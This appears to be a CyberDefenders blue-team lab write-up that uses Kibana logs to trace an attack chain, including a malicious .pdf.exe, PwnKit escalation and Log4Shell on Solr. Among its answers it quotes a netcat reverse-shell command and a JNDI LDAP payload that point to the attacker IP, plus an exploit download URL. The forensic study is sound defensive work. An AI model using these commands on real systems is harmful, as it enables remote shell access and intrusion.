search

Elastic-Case

An attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system, along with that, The Security Team did not update most systems....

LogoElasticCase | Blue team challenge.CyberDefenderschevron-right

After Downloading the file we have to unzip it and then open using Vmware (I faced a problem when trying to open it by Vmware workstation pro 17 ) so I opened it using Virtual Box.

it will ask you for the username/password it is: elastic/elastic.

wait for a minute then access Kibana from the host machine via http://127.0.0.1:5601

Now all is ready.

hashtag
Q1 Who downloads the malicious file which has a double extension?

for this question I tried to search for http requests "get" but there is nothing,

tried to filter with file.name : *.*.* but there was 23.000 event.

then tried to search in the Security alerts, and here it is I found many alerts about files.

so I tried to filter it by using the filter : file.name : *.*.*

and I found that there are files ending with .pdf.exe (cybery - Ahmed)

from the timeline the first alert is made from Ahmed then cybery open the file again

Answer: Ahmed

hashtag
Q2 What is the hostname he was using?

from the previous screen, it is DESKTOP-Q1SL9P2

Aswer: DESKTOP-Q1SL9P2

hashtag
Q3 What is the name of the malicious file?

from the previous screen,

Answer :Acount_details.pdf.exe

hashtag
Q4 What is the attacker's IP address?

from the previous screen, click analyze event, then from the network find the destination address:192.168.1.10

Answer: 192.168.1.10

hashtag
Q5 Another user with high privilege runs the same malicious file. What is the username?

From the anwers of Q1, he is cybery

Answer: cybery

hashtag
Q6 The attacker was able to upload a DLL file of size 8704. What is the file name?

filter with the mentioned size and file name with extention .dll with the following filter:

Answer: mCblHDgWP.dll

hashtag
Q7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

filter with the pid and winlogs by the following filter :

winlog.user.domain : "NT AUTHORITY" and process.pid : 10716

then go to process.parent.name from the left panel: there is cmd.exe and rundll32.exe

after some investigation the cmd.exe opened rundell32.exe then it opened a cmd.exe with more privileges.

I found it when I tried to look at the alerts.

so the process with pid 10716 is cmd.exe and its parent is rundll32.exe

Answer: rundll32.exe

hashtag
Q8 The previous process was able to access a registry. What is the full path of the registry?

filter with the process by the following filter :

process.name : "rundll32.exe"

then go to the registry key from the left panel.

Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

hashtag
Q9 PowerShell process with pid 8836 changed a file in the system. What was that filename?

let us filter with the process by the following filter :

process.pid : 8836 and event.action : "overwrite"

here it is, look at the file name and find the answer.

Answer: ModuleAnalysisCache

hashtag
Q10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

we have pid ,file extension and the action type, so we could find it easily by making the following filter :

process.pid : 11676 and event.action : "creation" and file.name : *.ps1

now look at the tine and answer is in this packet .

Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

hashtag
Q11 What is the machine's IP address that is in the same LAN as a windows machine?

from Security go to Network then filter host.os.name : "Windows"

so that is the mentioned ip :192.168.10.10 and the needed ip must include : 192.168.10.(2:254) as it in the same LAN

After some investigations of the ips there is a suitable ip:192.168.10.30

Answer: 192.168.10.30

hashtag
Q12 The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

from Security>Hosts scroll down theen select Ubuntu .

now look at the Authentications, Salem is the last successful try for the attacker.

Answer: Salem

hashtag
Q13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

ok, we have a tool: wget , the attacker user name : Salem, and have to find the URL

from the prevoius screen

so I tried to find it by looking at the user activity and here it is.

Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.pyarrow-up-right

hashtag
Q14 After The attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?

again make a filter to find a process with name: pkexec and the user was Salem as following :

process.name : pkexec and group.name : "salem"

Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

hashtag
Q15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

we have the process pid :3011 and the user name: root so make a filter

process.pid : 3011 and user.name : root

finally go to process.command_line from the left.

Answer: bash -i

hashtag
Q16 What is the hostname which alert signal.rule.name: "Netcat Network Activity"?

for this question let us investigate at the Security tab - alerts ,then filter with the foloowing filter :

signal.rule.name : "Netcat Network Activity"

Answer: centOS

Q17 What is the username who ran netcat?

from the previous screenshot, it is solr

Answer: solr

hashtag
Q18 What is the parent process name of netcat?

from the same screen let us make more deep investigation by selecting "Analyze event"

Answer: Java

hashtag
Q19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

from the analyst tab make a filter by the process name , and look at the results process parents command line

Answer: nc -e /bin/bash 192.168.1.10 9999

hashtag
Q20 From the previous three questions, you may remember a famous java vulnerability. What is it?

Answer: Log4Shell

hashtag
Q21 What is the entire log file path of the "solr" application?

filter for the user solr then look at the file path at the left panel

Answer: /var/solr/logs/solr.log

hashtag
Q22 What is the path that is vulnerable to log4j?

I filtered many times with the captured files till find the answer :

go to filebeat-* , filter : log.file.path : solr

Answer: /admin/cores

hashtag
Q23 What is the GET request parameter used to deliver log4j payload?

Actually, I used google to know the payload and found that ..

so i tried to filter with the payload to be sure that is the answer .

yes, that is right.

Answer: foo

hashtag
Q24 What is the JNDI payload that is connected to the LDAP port?

from the previous screen.

Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

Hope this writeup helped you, for questions feel free to message me.

Thank you

PreviousDetectLog4jNextPacketDetective

Last updated